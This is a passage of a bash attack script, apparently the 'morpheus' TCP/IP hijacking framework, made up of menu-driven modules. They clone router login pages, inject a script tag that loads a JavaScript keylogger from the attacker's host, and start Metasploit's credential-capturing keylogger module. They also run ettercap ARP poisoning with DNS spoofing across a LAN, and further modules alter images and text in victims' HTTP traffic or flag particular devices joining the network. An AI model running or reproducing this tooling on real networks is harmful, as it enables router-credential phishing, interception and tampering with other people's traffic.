echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}  This module allow you to clone the modem/router login webpage   ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} inject a java keylooger on it, then uses mitm + dns_spoof to be  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} abble to redirect target traffic to the cloned webpage were the  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} java keylooger (metasploit required) waits for input credentials.${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} WARNING:'msfconsole required to capture credentials from target' ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1



  # retrieve info about modem to inject into clone
  echo -e ${BlueF}[☠]${white} Gather Info about modem webpage${RedF}! ${Reset};
  nmap -sV -PN -p 80 $GaTe -oN $IPATH/output/retrieve.log | zenity --progress --pulsate --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text="Gather modem ip addr, mac addr and hostname .." --percentage=0 --auto-close --width 320 > /dev/null 2>&1


  # InjE=`cat $IPATH/output/retrieve.log | egrep -m 1 "open" | awk {'print $4,$5,$6'}`
  InjE=`cat $IPATH/output/retrieve.log | egrep -m 1 "open" | cut -d '(' -f2 | cut -d ')' -f1 | awk {'print $1,$2,$3'}` # grab modem name
  MaCa=`cat $IPATH/output/retrieve.log | egrep -m 1 "MAC" | awk {'print $3'}` # grab mac address ..
  # check if nmap have retrieved any string from scan
  if [ -z "$InjE" ]; then
  echo -e ${RedF}[x] Module cant gather Info about modem webpage! ${Reset};
  echo -e "${RedF}[x]${white} Using:${GreenF} 'broadband router'${white} as server name${RedF}!"
  sleep 2
  InjE="broadband router"
  MaCa="8A:17:62:35:22:UA"
  fi


# chose what phishing webpage to use 
PHiS=$(zenity --list --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Modem Info:\n$InjE\nLogin at: http://$GaTe\n\nChose phishing webpage to use" --radiolist --column "Pick" --column "Option" TRUE "Default" FALSE "Meo" FALSE "DLink" FALSE "TPLink" FALSE "ZTE" FALSE "Technicolor" --width 350 --height 370) > /dev/null 2>&1


  # building cloned login modem webpage
  cd $IPATH/bin/phishing/router-modem
  cp index.html index.rb > /dev/null 2>&1
  cp login.html login.rb > /dev/null 2>&1
  # chose 2º phishing webpage to use
  if [ "$PHiS" = "Meo" ]; then
    cp new.html new.rb > /dev/null 2>&1
  fi
  # chose 3 phishing webpage to use
  if [ "$PHiS" = "DLink" ]; then
    cp -r DLINK $ApachE/DLINK > /dev/null 2>&1
  fi
  # chose 4 phishing webpage to use
  if [ "$PHiS" = "TPLink" ]; then
    cp -r TPLink $ApachE/TPLink > /dev/null 2>&1
  fi
  # chose 5 phishing webpage to use
  if [ "$PHiS" = "ZTE" ]; then
    cp -r ZTE $ApachE/ZTE > /dev/null 2>&1
  fi
  # chose 6 phishing webpage to use
  if [ "$PHiS" = "Technicolor" ]; then
    cp -r Technicolor $ApachE/Technicolor > /dev/null 2>&1
  fi


  # grab modem ip addr
  if [ "$PHiS" = "Meo" ]; then
    MIP=`route -n | grep "UG" | awk {'print $2'} | tr -d '\n'`
  else
    MIP="www.google.im"
  fi
  # chose 2º phishing webpage to use
  if [ "$PHiS" = "Meo" ]; then
    sed -i "s/MoDemIP/$MIP/" new.html
    sed -i "s/MaCa/$MaCa/" new.html
    sed -i "s/MoDemIP/www.google.im/" login.html
  elif [ "$PHiS" = "Default" ]; then
    sed -i "s/MoDemIP/$MIP/" login.html
  elif [ "$PHiS" = "TPLink" ]; then
    :
  elif [ "$PHiS" = "ZTE" ]; then
    sed -i "s/MoDemIP/www.google.im/" login.html
  elif [ "$PHiS" = "Technicolor" ]; then
    sed -i "s/MoDemIP/www.google.im/" login.html
  else
    sed -i "s/MoDemIP/$MIP/" login.html
  fi
  echo -e ${BlueF}[☠]${white} Inject javascript Into clone webpage${RedF}!${Reset};
  sleep 1

  # chose 2º phishing webpage to use
  if [ "$PHiS" = "Meo" ]; then
    sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" new.html > copy.html
  elif [ "$PHiS" = "DLink" ]; then
    cd DLINK
    sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" index.html > $IPATH/bin/phishing/router-modem/copy.html
    cd ..
  elif [ "$PHiS" = "TPLink" ]; then
    cd TPLink
    sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" index.html > $IPATH/bin/phishing/router-modem/copy.html
    cd ..
  elif [ "$PHiS" = "ZTE" ]; then
    cd ZTE
    sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" index.html > $IPATH/bin/phishing/router-modem/copy.html
    cd ..
  elif [ "$PHiS" = "Technicolor" ]; then
    cd Technicolor
    sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" index.html > $IPATH/bin/phishing/router-modem/copy.html
    cd ..
  else
    sed "s/<\/body>/<script type='text\/javascript' src='http:\/\/$IP:8080\/support\/test.js'><\/script><\/body>/g" index.html > copy.html
  fi
  mv copy.html index.html > /dev/null 2>&1
  sed -i "s|GatWa|$GaTe|g" index.html
  sed -i "s|DiSpt|$InjE|g" index.html
  # copy all files to apache2 webroot
  echo -e ${BlueF}[☠]${white} Copy files to apache2 webroot${RedF}!${Reset};
  sleep 2
  cp index.html $ApachE/index.html # NO dev/null to report file not existence
  cp login.html $ApachE/login.html > /dev/null 2>&1
  cd ..
  cp -r $IPATH/bin/phishing/router-modem $ApachE/router-modem > /dev/null 2>&1
  cd $IPATH

    # backup all files needed.
    echo -e ${BlueF}[☠]${white} Backup all files needed${RedF}!${Reset};
    cd $IPATH/bin
    cp $IPATH/bin/etter.dns $IPATH/bin/etter.rb # backup (NO dev/null to report file not existence)
    cp $Edns /tmp/etter.dns > /dev/null 2>&1 # backup
    sleep 1
    # use SED bash command
    sed -i "s|TaRgEt|$IP|g" etter.dns > /dev/null 2>&1
    sed -i "s|PrE|$PrEfI|g" etter.dns > /dev/null 2>&1
    cp $IPATH/bin/etter.dns $Edns > /dev/null 2>&1
    echo -e ${BlueF}[☠]${white} Etter.dns configurated...${Reset};
    cd $IPATH
    sleep 1


    # start metasploit services
    echo -e ${BlueF}[☠]${white} Start metasploit services...${Reset};
    service postgresql start > /dev/null 2>&1
    if [ "$RbUdB" = "YES" ]; then
    msfdb delete > /dev/null 2>&1
    msfdb init > /dev/null 2>&1
    fi

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Start apache2 webserver...${Reset};
systemctl start httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Starting apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        xterm -T "MSFCONSOLE" -geometry 110x40 -e "sudo msfconsole -x 'use auxiliary/server/capture/http_javascript_keylogger; set DEMO 0; set LHOST $IP; set URIPATH support; exploit'" & ettercap -T -Q -i $InT3R -P dns_spoof -M arp /$rhost// /$gateway//
      else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        xterm -T "MORPHEUS TCP/IP HIJACKING" -geometry 110x40 -e "sudo msfconsole -x 'use auxiliary/server/capture/http_javascript_keylogger; set DEMO 0; set LHOST $IP; set URIPATH support; exploit'" & ettercap -T -Q -i $InT3R -P dns_spoof -M arp /$rhost/ /$gateway/
      fi

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $LoGmSf/*.txt $IPATH/logs > /dev/null 2>&1
  mv $IPATH/bin/etter.rb $IPATH/bin/etter.dns > /dev/null 2>&1
  mv $IPATH/bin/phishing/router-modem/index.rb $IPATH/bin/phishing/router-modem/index.html
  mv $IPATH/bin/phishing/router-modem/login.rb $IPATH/bin/phishing/router-modem/login.html
  mv $IPATH/bin/phishing/router-modem/new.rb $IPATH/bin/phishing/router-modem/new.html > /dev/null 2>&1
  mv /tmp/etter.dns $Edns > /dev/null 2>&1
  rm $IPATH/output/retrieve.log > /dev/null 2>&1
  rm $ApachE/index.html > /dev/null 2>&1
  rm $ApachE/login.html > /dev/null 2>&1
  rm -r $ApachE/router-modem > /dev/null 2>&1
  rm -r $ApachE/DLINK > /dev/null 2>&1
  rm -r $ApachE/TPLink > /dev/null 2>&1
  rm -r $ApachE/ZTE > /dev/null 2>&1
  rm -r $ApachE/Technicolor > /dev/null 2>&1
  # rm -r $IPATH/output/clone > /dev/null 2>&1
  cd $IPATH

# start apache2 webserver...
echo -e ${BlueF}[☠]${white} Stop apache2 webserver...${Reset};
systemctl stop httpd | zenity --progress --pulsate --title "☠ PLEASE WAIT ☠" --text="Stop apache2 webserver" --percentage=0 --auto-close --width 270 > /dev/null 2>&1
service postgresql stop > /dev/null 2>&1
# check if exist any reports
dd=`ls $IPATH/logs`
if ! [ -z "$dd" ]; then
Qu=$(zenity --info --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "logfiles stored $IPATH/logs" --width 270) > /dev/null 2>&1
fi

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# --------------------------------
# INJECT IMAGE INTO TARGET WEBSITE
# --------------------------------
sh_stage15 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}     This filter will replace the html tag '<img src=>' and       ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  injects your image in any webpage requested by target (http)    ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  WARNING:Thats no garantie that this filter will work with the   ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}recent security implementations added to modern webbrowsers(hsts) ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
cp $IPATH/filters/img_replace.eft $IPATH/filters/img_replace.rb > /dev/null 2>&1
sleep 1

  echo -e ${BlueF}[☠]${white} Edit img_replace.eft${RedF}!${Reset};
  sleep 1
 fil_one=$(zenity --title="☠ TARGET HOST ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
  # replace values in template.filter with sed bash command
  cd $IPATH/filters
  sed -i "s|TaRONE|$fil_one|g" img_replace.eft # NO dev/null to report file not existence :D
  cd $IPATH
  zenity --info --title="☠ MORPHEUS SCRIPTING CONSOLE ☠" --text "morpheus framework now gives you\nthe oportunity to just run the filter\nOR to scripting it further...\n\n'Have fun scripting it further'..." --width 270 > /dev/null 2>&1
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/img_replace.eft"
  sleep 1

    # compiling img_replace.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling img_replace.eft${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/img_replace.eft -o $IPATH/output/img_replace.ef && sleep 3"
    sleep 1
    #
    # port-forward
    #
    echo -e "1" > /proc/sys/net/ipv4/ip_forward
    cd $IPATH/logs

      # run mitm+filter
      # HINT: irongeek nao usou UID 0 e SSL active...


      echo -e ${BlueF}[☠]${white} access this url to test${RedF}:${GreenF} http://antt.dglab.gov.pt/${Reset};
      echo -e ${BlueF}[☠]${white} Remenber that this kind of attack works better againts Internet Explorer${Reset};
      sleep 2
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/img_replace.ef -M arp:remote /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/img_replace.ef -L $IPATH/logs/img_replace -M arp:remote /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/img_replace.ef -M arp:remote /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/img_replace.ef -L $IPATH/logs/img_replace -M arp:remote /$rhost/ /$gateway/
        fi
      fi


  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/img_replace.rb $IPATH/filters/img_replace.eft > /dev/null 2>&1
  #
  # port-forward
  #
  echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2
  rm $IPATH/output/img_replace.ef > /dev/null 2>&1
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}




# --------------------------------
# REPLACE TEXT INTO TCP RESPONSE
# --------------------------------
sh_stage16 () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}   This filter will replace text in target tcp responses (http)   ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  WARNING:Thats no garantie that this filter will work with the   ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}recent security implementations added to modern webbrowsers(hsts) ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter  RHOST ☠" --text "'morpheus arp poison settings'\n\Leave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
cp $IPATH/filters/text_replace.eft $IPATH/filters/text_replace.rb > /dev/null 2>&1
sleep 1

  echo -e ${BlueF}[☠]${white} Edit text_replace.eft${RedF}!${Reset};
  sleep 1
 fil_one=$(zenity --title="☠ TARGET HOST ☠" --text "example: $IP\nchose target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
 rep_one=$(zenity --title="☠ WORD TO REPLACE ☠" --text "example: hello\nchose a word to be replaced in tcp packet." --entry --width 270) > /dev/null 2>&1
 rep_two=$(zenity --title="☠ WORD TO REPLACE ☠" --text "previous word chosen: $rep_one\nRemmenber: world to be replaced must be of the same legth of the previous one" --entry --width 270) > /dev/null 2>&1
  # replace values in template.filter with sed bash command
  cd $IPATH/filters
  sed -i "s|IpAdDR|$fil_one|g" text_replace.eft # NO dev/null to report file not existence :D
  sed -i "s|RePlAcE|$rep_one|g" text_replace.eft > /dev/null 2>&1
  sed -i "s|InJeC|$rep_two|g" text_replace.eft > /dev/null 2>&1
  cd $IPATH
  zenity --info --title="☠ MORPHEUS SCRIPTING CONSOLE ☠" --text "morpheus framework now gives you\nthe oportunity to just run the filter\nOR to scripting it further...\n\n'Have fun scripting it further'..." --width 270 > /dev/null 2>&1
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/text_replace.eft"
  sleep 1

    # compiling img_replace.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling text_replace.eft${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/text_replace.eft -o $IPATH/output/text_replace.ef && sleep 3"
    sleep 1
    # port-forward
    # echo -e "1" > /proc/sys/net/ipv4/ip_forward
    cd $IPATH/logs

      # run mitm+filter
      # HINT: irongeek nao usou UID 0 e SSL active...
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/text_replace.ef -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/text_replace.ef -L $IPATH/logs/text_replace -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/text_replace.ef -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/text_replace.ef -L $IPATH/logs/text_replace -M ARP /$rhost/ /$gateway/
        fi
      fi


  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  mv $IPATH/filters/text_replace.rb $IPATH/filters/text_replace.eft > /dev/null 2>&1
  # port-forward
  # echo -e "0" > /proc/sys/net/ipv4/ip_forward
  sleep 2
  rm $IPATH/output/text_replace.ef > /dev/null 2>&1
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}






# ----------------------
# WRITE YOUR OWN FILTER
# ----------------------
sh_stageW () {
echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}    This module allow you to write your own filter from scratch.  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}  morpheus presents a 'template' previous build for you to write  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} your own command logic and automate the compile/lunch of filter. ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2
# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute this module?" --width 270) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then

# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
rhost=$(zenity --title="☠ Enter RHOST ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1
gateway=$(zenity --title="☠ Enter GATEWAY ☠" --text "'morpheus arp poison settings'\nLeave blank to poison all local lan." --entry --width 270) > /dev/null 2>&1

  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  cp $IPATH/filters/template.eft $IPATH/filters/template.rb > /dev/null 2>&1
  sleep 1

  echo -e ${BlueF}[☠]${white} Edit template${RedF}!${Reset};
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/template.eft"
  sleep 1


    # compiling template.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling template${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/template.eft -o $IPATH/output/template.ef && sleep 3"
    sleep 1
    # port-forward
    # echo -e "1" > /proc/sys/net/ipv4/ip_forward
    cd $IPATH/logs

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2

      #
      # execute warn.sh (BEEP) script ?
      #
      warnme=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "Execute warn.sh script?\n\nWARNING: your filter must contain\nthe follow rule to trigger BEEP sounds:\nlog(DATA.data, \"./beep-warning.beep\");" --width 290) > /dev/null 2>&1
      if [ "$?" -eq "0" ]; then
        # check if: log(DATA.data, "./beep-warning.beep"); API exists in template ..
        cfg=`cat $IPATH/filters/template.eft | grep "log(DATA.data, \"./beep-warning.beep\");"`
        if [ "$?" -eq "0" ]; then
          xterm -T "MORPHEUS - warn.sh" -geometry 108x24 -e "cd $IPATH/bin && ./warn.sh" &
        else
          echo -e ${RedF}[x]${white} Filter rule:${YellowF}" log(DATA.data, \"./beep-warning.beep\");"${Reset};
          echo -e ${RedF}[x] Not found inside Filter, aborting warn.sh execution ..${Reset};
          sleep 4
        fi
      fi

      cd $IPATH/logs
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/template.ef -M ARP /$rhost// /$gateway//
        else
        echo -e ${GreenF}[☠]${white} Using IPv6 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/template.ef -L $IPATH/logs/template -M ARP /$rhost// /$gateway//
        fi

      else

        if [ "$LoGs" = "YES" ]; then
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/template.ef -M ARP /$rhost/ /$gateway/
        else
        echo -e ${GreenF}[☠]${white} Using IPv4 settings${RedF}!${Reset};
        ettercap -T -Q -i $InT3R -F $IPATH/output/template.ef -L $IPATH/logs/template -M ARP /$rhost/ /$gateway/
        fi
      fi
    

  # clean up
  echo -e ${BlueF}[☠]${white} Cleaning recent files${RedF}!${Reset};
  sleep 2
  mv $IPATH/filters/template.rb $IPATH/filters/template.eft > /dev/null 2>&1
  rm $IPATH/output/template.ef > /dev/null 2>&1
  # HINT: warn.sh script will run in backgroud if we dont kill the process ..
  if [ "$warnme" = "execute warn.sh" ]; then
    killall warn.sh > dev/null 2>&1
  fi
  cd $IPATH

else
  echo -e ${RedF}[x]${white} Abort current tasks${RedF}!${Reset};
  sleep 2
fi
}




# ----------------------------------------
# DHCP DISCOVER (smartphones & PCs)
# ----------------------------------------
sh_stage17 () {

echo -e ""
echo -e "${BlueF}    ╔───────────────────────────────────────────────────────────────────╗"
echo -e "${BlueF}    | ${YellowF}This module capture sellected 'device' request to access the local${BlueF}|"
echo -e "${BlueF}    | ${YellowF} LAN (bootp-dhcp 67/UDP) and it trigger one sound warning (BEEP). ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                                                                  ${BlueF}|"
echo -e "${BlueF}    | ${YellowF}                          -- WARNING --                           ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} If the input domain name (target to filter) does NOT contain any ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} numbers in the END of the string (eg. android-dd4e5d9sy670) then ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} we need to wait for 'MORPHEUS SCRIPTING CONSOLE' terminal windows${BlueF}|"
echo -e "${BlueF}    | ${YellowF} to delete the nº7 from the domain name (morpheus add's nº 7 into ${BlueF}|"
echo -e "${BlueF}    | ${YellowF} the end of the domain name for smartphones discovery/detection). ${BlueF}|"
echo -e "${BlueF}    ╚───────────────────────────────────────────────────────────────────╝"
echo -e ""
sleep 2

# run module?
rUn=$(zenity --question --title="☠ MORPHEUS TCP/IP HIJACKING ☠" --text "[ Devices DHCP discovery ]\nthis module allow users to filter any device\n(domain name OR ip addr) thats trying to access our local lan for the first time (auth)\n\nExecute this module?" --width 300) > /dev/null 2>&1
if [ "$?" -eq "0" ]; then


# chose to input one or two targets to filter
Tc=$(zenity --list --title "☠ MORPHEUS TCP/IP HIJACKING ☠" --text "This module allow users to filter one or two targets" --radiolist --column "Pick" --column "Option" TRUE "one target input" FALSE "two targets input" --width 300 --height 180) > /dev/null 2>&1


# get user input to build filter
echo -e ${BlueF}[☠]${white} Enter filter settings${RedF}! ${Reset};
sleep 1
cp $IPATH/filters/dhcp-discovery.eft $IPATH/filters/dhcp-discovery.bak > /dev/null 2>&1
rhost=$(zenity --title="☠ DEVICE TO FILTER ☠" --text "example: android-c6216f4h7297e1ef\nchose remote target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
CeDs=$(zenity --title="☠ DEVICE DESCRIPTION ☠" --text "Give a description of the device\nexample: cellphone (pedro)" --entry --width 270) > /dev/null 2>&1
#
# pasing rtarget ip addr (add number 7 at the end of domain-name)
#
store=`echo -e "$rhost""7"`
echo -e "$store" > $IPATH/logs/parse



if [ "$Tc" = "two targets input" ]; then
Most=$(zenity --title="☠ DEVICE TO FILTER ☠" --text "example: android-c6216f4h7297e1ef\nchose remote target to filter through morpheus." --entry --width 270) > /dev/null 2>&1
Desc=$(zenity --title="☠ DEVICE DESCRIPTION ☠" --text "Give a description of the device\nexample: cellphone (pedro)" --entry --width 270) > /dev/null 2>&1

  #
  # parsing data (add number 7 at the end of domain-name)
  #
  twoop=`echo -e "$Most""7"`
  echo -e "$twoop" > $IPATH/logs/triggertwo

  # write the rest of the filter (injects into existing filter)
  echo -e "" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "if (ip.src == '0.0.0.0' && ip.proto == UDP && udp.dst == 67) {" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "  if (search(DATA.data, \"$twoop\")) {" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "  msg(\".\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    msg(\"[morpheus] host:0.0.0.0 [ ⊶  ]  found ..\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    msg(\"[morpheus] | status  : Request access to LAN\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    msg(\"[morpheus] |   port  : 67/UDP(dst) bootp-DHCP ✔\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    msg(\"[morpheus] |   id    : $twoop\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    msg(\"[morpheus] |_  device: $Desc\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    msg(\".\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    log(DECODED.data, \"./beep-warning.beep\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "    log(DECODED.data, \"./triggertwo.bin\");" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "  }" >> $IPATH/filters/dhcp-discovery.eft
  echo -e "}" >> $IPATH/filters/dhcp-discovery.eft

fi


  cd $IPATH/filters
  # replace values in template.filter with sed bash command
  echo -e ${BlueF}[☠]${white} Backup files needed${RedF}!${Reset};
  sed -i "s|rTdN|$store|g" dhcp-discovery.eft
  sed -i "s|FtGh|$CeDs|g" dhcp-discovery.eft
  cd $IPATH
  zenity --info --title="☠ MORPHEUS SCRIPTING CONSOLE ☠" --text "morpheus framework now gives you\nthe oportunity to just run the filter\nOR to scripting it further...\n\n'Have fun scripting it further'..." --width 270 > /dev/null 2>&1
  xterm -T "MORPHEUS SCRIPTING CONSOLE" -geometry 115x36 -e "nano $IPATH/filters/dhcp-discovery.eft"
  sleep 1

    # compiling firewall.eft to be used in ettercap
    echo -e ${BlueF}[☠]${white} Compiling dhcp-discovery.eft${RedF}!${Reset};
    xterm -T "MORPHEUS - COMPILING" -geometry 90x26 -e "etterfilter $IPATH/filters/dhcp-discovery.eft -o $IPATH/output/dhcp-discovery.ef && sleep 3"
    sleep 1
    cd $IPATH/logs

      # run mitm+filter
      echo -e ${BlueF}[☠]${white} Running ARP poison + etter filter${RedF}!${Reset};
      echo -e ${YellowF}[☠]${white} Press ${YellowF}[q]${white} to quit ettercap framework${RedF}!${Reset};   
      sleep 2
      if [ "$IpV" = "ACTIVE" ]; then
        if [ "$LoGs" = "NO" ]; then
